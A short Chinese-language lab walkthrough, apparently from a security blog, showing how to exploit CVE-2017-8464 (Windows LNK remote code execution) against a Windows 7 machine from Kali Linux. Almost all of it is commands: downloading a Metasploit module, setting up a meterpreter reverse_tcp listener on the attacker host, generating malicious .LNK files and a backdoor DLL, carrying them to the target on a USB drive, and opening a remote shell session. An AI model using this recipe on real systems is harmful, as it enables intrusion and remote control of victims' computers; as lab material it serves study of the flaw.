1.漏洞環境及攻擊系統
漏洞環境
靶機: win7 x64 :192.168.1.102
攻擊機:kali x64 :192.168.1.104
漏洞利用
1.kali 主機下載 cve_2017_8464_lnk_rce.rb:
wget https://raw.githubusercontent.com/ykoster/metasploit-framework/169e00bf3442447324df064192db62cdc5b5b860/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
2.將 cve_2017_8464_lnk_rce.rb 複製到/usr/share/metasploit-framework/modules/exploit/windows/smb/目錄下:
cp cve_2017_8464_lnk_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
3.生成監聽shell:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.104
msf5 exploit(multi/handler) > exploit -j
4.生成大量的.LNK文件(對應盤符從D盤到Z盤)和要加載的.dll文件(後門文件, copy了一個lnk文件(根據插入靶機U盤後識別的盤符,例如我插入U盤後顯示的E盤,所以就選擇了E結尾的lnk文件)和dll文件到U盤),新開一個終端
msf5 > use exploit/windows/smb/cve_2017_8464_lnk_rce
msf5 exploit(windows/smb/cve_2017_8464_lnk_rce) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/cve_2017_8464_lnk_rce) > set lhost 192.168.1.104
msf5 exploit(windows/smb/cve_2017_8464_lnk_rce) > exploit
5.將/root/.msf4/local/*所有文件拷貝到/opt目錄下的test文件夾中,然後拷貝到目標靶機windows7X64上
6.拷貝到靶機上,然後執行.dll,如果不行,就在cmd中執行
7.在kali下可以看到成功獲得sesions會話爲1
msf5 exploit(multi/handler) > sessions -i 1
攻擊成功!